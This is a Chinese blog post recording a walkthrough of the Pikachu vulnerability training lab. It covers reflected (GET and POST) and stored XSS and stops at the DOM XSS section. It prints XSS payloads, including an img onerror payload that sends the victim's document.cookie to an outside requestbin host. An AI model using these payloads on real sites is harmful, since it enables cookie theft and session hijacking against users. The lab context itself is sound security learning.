pikachu漏洞靶场打靶记录

pikachu漏洞靶场打靶记录

摘要:这阵子打算刷几个类似这样的靶场,一方面巩固下自己所学的知识点,另一方面系统下自己的知识体系。

0x01 写在前面

入门网安也有段时间了,一直在看书、刷CTF题,还没有打过这种类似的靶场,这阵子打算刷几个类似这样的靶场,一方面巩固下自己所学的知识点,另一方面系统下自己的知识体系。在github上找了这个名为pikachu 的靶场,口碑貌似蛮不错的,就在本地搭建了一个试试,效果图如下:

本篇博客算作记录吧。

0x02 正文

XSS部分

get反射型XSS

前端有一个字符输入的限制,直接修改掉即可。没有任何过滤,直接上script脚本。payload:

1
<script>alert(1);</script>

post反射型XSS

登陆完,要求我们获得cookie。可以在buu中开一个requestbin。payload如下:

1
<img src="#" onerror="this.src='http://http.requestbin.buuoj.cn/1ea2qek1?a='+document.cookie" />

存储型XSS

没有任何过滤,直接上,可以先上一个alert(1)。这就很明显地区分了反射型和存储型XSS的区别了,存储型会一直存在,每次点击都会有一次触发——这就是XSS在蠕虫病毒上的应用。

1
2
3
<script>alert(1);</script>

<img src="#" onerror="this.src='http://http.requestbin.buuoj.cn/1ea2qek1?a='+document.cookie" />

DOM型XSS

TO BE CONTINUE…


评论